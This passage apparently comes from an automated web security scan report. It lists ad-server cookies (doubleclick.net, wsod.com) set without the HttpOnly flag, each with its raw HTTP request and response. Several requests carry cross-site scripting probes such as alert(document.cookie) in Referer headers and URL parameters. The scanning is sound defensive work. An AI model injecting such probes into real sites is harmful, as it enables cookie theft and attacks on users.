Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 02:04:12 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 133254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- DC_PAGE_ID: 1, ADID: -->
<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...

17.65. http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3973.MSN/B4412732.227

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N3973.MSN/B4412732.227;sz=1x1;ord=1362758608? HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 29 Jan 2011 23:26:33 GMT
Location: http://s0.2mdn.net/viewad/1150992/54-1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html


17.66. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 345
Set-Cookie: id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:11:59 GMT
Expires: Sun, 30 Jan 2011 17:11:59 GMT
Discarded: true
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/0/0/%2a/s;
...[SNIP]...

17.67. http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click;h=v8/3a9f/7/0/*/q;234336715;1-0;0;57860936;4307-300/250;40005125/40022912/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch
Set-Cookie: id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT
Date: Sun, 30 Jan 2011 02:04:52 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


17.68. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;235581983;52388360;s HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://weeklyad.staples.com/staples/new_user_entry.aspx?mode=flash&sneakpeek=y&cm_mmc=display_ads-_-WeeklyAd-_-WeeklyAd-_-MSN&cid=BAN:RETAIL:MSN:MSN:WEEKLYAD:20101201:WEEKLYADSNEAKPEEK:VARIOUS:N
Set-Cookie: id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT
Date: Sat, 29 Jan 2011 23:45:11 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


17.69. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 02:05:04 GMT; path=/
Set-Cookie: c_1=33:353:23:3:0:38345:1296353104:L|33:967:555:0:0:36941:1294800536:L; expires=Tue, 01-Mar-2011 02:05:04 GMT; path=/
Location: http://www.scottrade.com/lp/pc1/?cid=AM|33|353|23|3&rid=L|0&amvid=4d2cdd9abba1d
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


17.70. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 02:05:10 GMT; path=/
Set-Cookie: c_1=33:353:516:3:0:38345:1296353110:L|33:967:555:0:0:36941:1294800536:L; expires=Tue, 01-Mar-2011 02:05:10 GMT; path=/
Location: http://www.scottrade.com/lp/7e/?cid=AM|33|353|516|3&rid=L|0&amvid=4d2cdd9abba1d
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


17.71. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
Set-Cookie: i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2438

   function wsod_flash() {
       document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250" id="W_8_45_5" align="middle">');
       document.write('<param name="salign"
...[SNIP]...

17.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4d1e80eb13df2; i_1=33:1359:827:0:0:37452:1295382870:L|33:971:560:0:0:37049:1294887076:L|33:971:560:0:0:36941:1294798634:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 23:26:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d1e80eb13df2; expires=Tue, 01-Mar-2011 23:26:33 GMT; path=/
Set-Cookie: i_1=33:1359:827:0:0:34115:1296343593:B2|33:1359:827:0:0:37452:1295382870:L|33:971:560:0:0:37049:1294887076:L; expires=Mon, 28-Feb-2011 23:26:33 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


17.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:21 GMT; path=/
Set-Cookie: fp=599362::7:IN:::1296392421:1:33; expires=Sat, 30-Apr-2011 13:00:21 GMT; path=/; domain=.wsod.com
Set-Cookie: i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2; expires=Tue, 01-Mar-2011 13:00:21 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


17.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://money.redacted//?4ae1b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 12:56:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:46 GMT; path=/
Set-Cookie: i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L; expires=Tue, 01-Mar-2011 12:56:46 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


17.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:59:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:14 GMT; path=/
Set-Cookie: i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2; expires=Tue, 01-Mar-2011 17:59:14 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


17.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:27 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 13:00:27 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 903

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd1
...[SNIP]...

17.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:50 GMT; path=/
Set-Cookie: i_1=33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 13:00:50 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 897

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d
...[SNIP]...

17.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8e2afde2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:59:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:25 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2; expires=Tue, 01-Mar-2011 17:59:25 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 885

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8
...[SNIP]...

17.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
